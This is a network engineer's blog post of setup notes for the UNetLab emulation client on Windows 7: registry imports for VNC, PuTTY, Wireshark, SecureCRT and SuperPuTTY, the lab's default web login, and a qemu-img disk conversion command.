copy ultravnc_wrapper.bat into C:\Program Files\uvnc bvba\UltraVNC

run win7_64bit_ultravnc.reg

run win7_64bit_putty.reg

run win7_64bit_wireshark.reg

-to open multiple tab session in SecureCRT

run win7_64bit_crt.reg

edit C:\Users\username\AppData\Roaming\VanDyke\Config\Global.ini

change

D:”Single Instance”=00000000

D:”Single Instance”=00000001

-to open multiple tab with SuperPutty

download and install SuperPutty from https://github.com/jimradford/superputty/releases

open SuperPutty and tick Tools/Options/Advanced/Only allow single instance of SuperPuTTYy to run

create SuperPutty.reg

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\telnet]

@=”URL:Telnet Protocol”

“URL Protocol”=””

[HKEY_CLASSES_ROOT\telnet\shell]

[HKEY_CLASSES_ROOT\telnet\shell\open]

[HKEY_CLASSES_ROOT\telnet\shell\open\command]

@=”\”C:\\Program Files (x86)\\SuperPuTTY\\SuperPutty.exe\” %1″

go to http://10.0.20.71 and Sign-in with
L: admin
P: unl

-to connect unetlab to the cloud
http://www.unetlab.com/2014/11/using-cloud-devices/

-to rename a lab file

clone or open existing file

click More Actions/Edit lab

change the Name

-to convert VirtualBox vdi to qcow2 format

# /opt/qemu/bin/qemu-img convert -f vdi -O qcow2 vm.vdi vm.qcow2

-cisco CSR 1000v take 2.5GB RAM per node, if you want less ram, use L3-ADVENTERPRISEK9-M-15.4-2T.bin instead

Nbctcp's Weblog

From Engineer for Engineers

Tag Archives: PaloAlto

Killing stuck process

Firewall/Router Attack – BlackNurse

How to disable SIP ALG

PaloAlto UNL Basic config

Blocking Browsec Chrome Extension

Blocking Opera Turbo

Blocking Telegram

Blocking ZenMate

Blocking YouTube

Eve-NG Installation on ESXi